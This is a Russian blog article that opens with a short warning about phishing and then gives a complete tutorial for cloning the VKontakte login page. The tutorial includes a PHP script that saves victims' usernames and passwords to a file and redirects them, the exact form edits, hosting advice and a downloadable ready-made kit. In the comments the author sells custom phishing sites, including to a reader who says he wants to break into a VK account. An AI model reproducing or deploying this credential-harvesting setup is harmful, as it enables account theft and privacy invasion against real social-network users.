Как не попасться на фишинговый сайт?

В этой статье я расскажу, что такое фишинг вконтакте. Как не попасться на фишинговый сайт, и не спалить свои учетные данные. Также приведу пример создания такого сайта.

Что такое фишинг?

Вообще слово fishing переводится как рыбалка. Фишинг – это подмена какого-либо сайта, на котором пользователи вводят учетные данные, такие как «логин» и «пароль», после чего перенаправляются на официальный сайт, чтобы не было подозрений. А нехороший человек «редиска» узнает ваши учетные данные, и может входить под вашим логином на сайт.

Будьте внимательными

Как вам могут подсунуть такой сайт, есть пару примеров.

  1. На любом ресурсе может быть ссылка, в которой говорится: “добавь меня в друзья и получи за это 10 голосов вконтакте”. Согласитесь, заманчиво? Жертва переходит по этой ссылке, попадает на сайт вроде бы ничем не отличающийся от сайта вконтакте, вводит «логин» и «пароль». Попадает себе на страничку, голосов не прибавилось. Долго думает и в итоге забивает на это дело, а данные от учетной записи уже у «редиски».
  2. Ваша девушка или парень, дает вам ссылку на сайт, с предлогом лайкни Кота =) Вы без задней мысли переходите по ссылке, вводите «логин» и «пароль». И ваша вторая половинка теперь знает ваши учетные данные, и сможет посмотреть с кем это вы там переписываетесь =)

И еще куча вариантов, как можно заманить жертву на такой вот сайт.

Смотрите куда вы переходите, если вы сидите в данный момент в контакте и вам дают ссылку, вы по ней переходите, видите страницу авторизации, у вас сразу же должно закрасться подозрение. Обратите внимание на адрес сайта. Допустим вконтакте, адрес его: vk.com или vkontakte.ru. Не многие могут запомнить длинные доменные имена сайтов, их легче всего подделать. Я думаю из-за этого социальная сеть вконтакте, перешла на столь короткий доменный адрес, чтобы его было труднее подделать. Если вы увидите адрес vk.org то вы особо и не увидите подвоха, если после него чего-нибудь написать, например: так вообще адрес как адрес. Ну так вот, если вас где-то просят ввести пароль, проверяйте внимательно доменный адрес.

Создание фишинг сайта

Данный материал приводится сугубо для ознакомления, а не для ломания учетных записей своих знакомых и друзей, также помните, что это уголовное дело.

И так приведу пример создания фишингового сайта для социальной сети вконтакте.

Открываем любой браузер, заходим по адресу vk.com,

адресная строка вашего браузера

жмем файл => сохранить как =>

рабочий стол вашего компьютера

Имя файла: index.html

Тип файла: Веб – страница, полностью с картинками. Жмем кнопку, Сохранить.

Теперь нужно создать скрипт, который будет передавать данные введенные в поле логин и пароль. Назовем его icq.php

Открываем блокнот и вставляем туда этот код.

<?

$Login = $_POST[zabor]; // Логин  жертвы

$Pass = $_POST[‘zena’]; // Пароль жертвы

$log = fopen(“ups.php”,”a+”); //тут будут лежать пароли жертв

fwrite($log,”<br> $Login:$Pass \n”); //производим запись в ups.php

fclose($log); //закрывает ups.php

echo “<html><head><META HTTP-EQUIV=’Refresh’ content =’0; URL=http://vkontakte.ru’></head></html>”; // перенаправляем жертву на http://vk.com

?>

Закрываем и сохраняем как icq.php

Открываем в блокноте файл, index.html. Открываем поиск (ctrl+f) и вводим <form жмем enter.

Он найдет строчку:

<FORM name=”login” id=”quick_login_form” onsubmit=”if (vklogin) {return true} else {quick_login();return false;}” action=”https://login.vk.com/?act=login” method=”POST”>

Меняем её на это:

<FORM name=”login” id=”quick_login_form” onsubmit=”if (vklogin) {return true} else {quick_login();return false;}” action=”icq.php” method=”POST”>

Дальше, смотрим чуть ниже и находим строчку:

<INPUT name=”email” id=”quick_email” onfocus=”show’quick_expire’)” type=”text”>

Меняем на это:

<INPUT name=”zabor” id=”quick_email” onfocus=”show(‘quick_expire’)”type=”text”>

Смотрим еще чуть ниже и находим строчку:

<INPUT name=”pass” id=”quick_pass” onfocus=”show(‘quick_expire’)”type=”password”>

Меняем на это:

<INPUT name=”zena” id=”quick_pass” onfocus=”show(‘quick_expire’)”type=”password”>

Дальше необходимо кнопку «Войти» включить в форму, чтобы она работала, для этого, находим чуть ниже закрывающийся тег </form>, вырезаем его и вставляем его вот тут.

<DIV class=”button_blue button_wide”><BUTTON id=”quick_login_button”>Войти</BUTTON></form></DIV>

Сохраняем index.html, и у вас в итоге получилось два файла файла и одна папка. Дальше все это дело нужно будет залить на ваш хостинг. Вот этим https://beget.com можно месяц бесплатно пользоваться, можно купить на месяц,  всего 150 рублей. Я думаю, вы умеете это делать, если нет, задайте вопрос в комментариях.

Когда жертва зайдет на вашу страничку фишинговую, введет «логин» и «пароль», у вас создатся на хостинге еще один файл, ups.php в нем и будут храниться учетные записи.

Рассказ о том как залить все это дело на хостинг

Вывод

В этой статье вы узнали, как себя обезопасить и не попасться на фишинговый сайт. Как создать фишинговый сайт. Скачать готовый, фишинг для вконтакта, можно ниже, для ознакомительных целей.


(adsbygoogle = window.adsbygoogle || []).push({});

Скачать готовый фишинговый сайт для вконтакте.

Друзья, пройдите опрос на тему какие еще фишинги можно сделать и нужны ли они у нас в группе:https://vk.com/27sysday

В связи с большим количеством обращений, решил создать услугу по настройке.

Что понадобится

  1. Вам нужно зарегистрироваться https://beget.com
  2. Связать со мной в скайпе spbskull.
  3. Сказать мне логин и пароль.
  4. Пополнить баланс телефона на 1000 рублей (тел. скажу в скайпе).
  5. Через час после оплаты, получите готовое решение.

Фишинг атаки как не попасть в ловушку

Помогла статья? Оцените её
Очень плохоПлохоСреднеХорошоОтлично (6 оценок, среднее: 9,33 из 5)
Загрузка...
Комментарии
  1. алексей

    Бля щас вк поставили защиту от фишинга и по этому ничего не выйдет вас предупридят о фишинге

    • Admin

      че это вдруг, если вы заходите на стороний ресурс и там же вводите логин и пароль, понятное дело что ссылку нужно давать не через ВК а допустим через вацап.

  2. dfgdfggfddfg

    Актуально с новой версией вк?

    • Admin

      принцип тот же

  3. Serhiy

    Сайт сделал большое спасибо

  4. Данил

    как сохранить в файл ? не понял даже первого шага…

    • Admin

      значит это не ваше

  5. Виктор

    Антон, как с вами связаться? В вк написал, но вы в него не заходите.

    • Admin

      захожу, но редко лучше писать в скайп

  6. Вася

    Меня на моем хостинге попросили убрать фишинговый сайт. А на том, который Вы рекомендуете, так не сделают?

    • Admin

      Пока все хорошо

    • Admin

      меня еще не попросили за год, не палите его

  7. Менталист

    Админ а ты в ВК есть дай мне свой Id Адрес я тут кое что не понимаю нужно поговорить

    • Admin

      ищи на сайте, все контакты есть

  8. ggg

    плез сними лучше видео я пытаюсь сделать но не понимаю

  9. Дима

    А ” одноклассников” можно?

    • Admin

      тот же самый принцип

  10. Anonimus

    Все по другому не могу нечего сделать помогите что у вас за {windows}
    это первое
    2)-лучше ролик выложи как это все делаешь что бы понятнее было
    3)- Пиши все подробно желательно с картинками что бы было понятнее

    • Admin

      семерка у меня стояла ТОГДА

  11. Аноним

    нет строчки FORM

    • Admin

      Ну смотрите лучше, я смотрю у меня есть, а вы смотрите у вас нет

  12. Аноним

    в блокноте не может найти <from
    что делать???

    • Admin

      Только что проверил, все он находит, возможно вы что-то сделали не так, попробуйте снова все сделать с нуля.

    • Иван

      у Вас написано from а надо form

  13. виталик

    хочу заказать фишинг.это можно у вас?

    • Admin

      можно

  14. www

    Из-за чего в файле где должны сохранять пароли, сохраняется только двоеточие типа : ?

    • Admin

      Права на запись дали?

  15. Юлиан

    Извините за такой вопрос, но как залить эти файлы на хостинг???

    • Admin

      Добавил видео в статью.

  16. Сергей

    У меня есть готовый фейк который вы можете скачать и подсунуть его друзьям

  17. Артур

    Будет ли обновление, т.к. сайт вк изменился?

    • Admin

      А надо опрос провести, требуется ли вообще это кому-то кроме вас.

      • erick

        Да,думаю будет очень полезно,обновите пожалуйста

  18. info

    Друг не надо так )) Тебя за это могут хлопнуть.
    Нарушаешь пару законов.
    1) Не законное копирование и изменение материалов сайта. С целью продажи.
    2) Соучастие в хищении данных пользователя. А представь синий кит угнать захотел ак школьника , ты им помог , школьник руки на себя наложил, в итоге оба уехали на 8 лет.
    3) Доход не обложенный налогами. За то что зарабатываешь у нас в стране надо платить.
    А так статья норм )) Знакомый скинул оценить.

  19. антон

    давайте проведем опрос? сколько вам не жалко потратить денег на такую услугу, по созданию сайта?

  20. Аноним

    А можно создать страницу мне фишинг яб те заплатил мне прост нада взломать вк

    • Admin

      можно

      • Павел

        Можете сделать фишинговый сайт на заказ?

        • Admin

          Можно

          • напишите мне

            напишите свою почту хочу заказать

            • Admin

              В ВК ПИШИТЕ

      • Жандос

        услуга сколько стойт

        • Admin

          1500

  21. Артур

    При попытке зайти на сайт всплывает сообщение, что он не прилинкован. Хотя я проверял на beget, что линк стоит. Как можно открыть сайт?

    • Admin

      это лучше в ТП написать им

  22. ARTES

    Здравствуйте!Простите пожалуйста за тупой вопрос,я создал хостинг,как теперь залить и что собственно из 3 компонентов заливать??

  23. Влад

    При вводе данных(логина и пароля) в документ приходит ВСЕГДА вот ето
    вв:вв
    5555555:7777777777
    Что не так!?

    • Admin

      Права на файил посмотрите

      • илья

        почему у меня не находит строчку <FORM ?

        • Admin

          Попробуйте сделать все снова

  24. Денис

    Есть видео урок?

    • вадим

      могу помочь

    • Антон

      Да тут же и так все понятно, если будет много просьб сделаю.

Добавить комментарий

Вверх
Adblock detector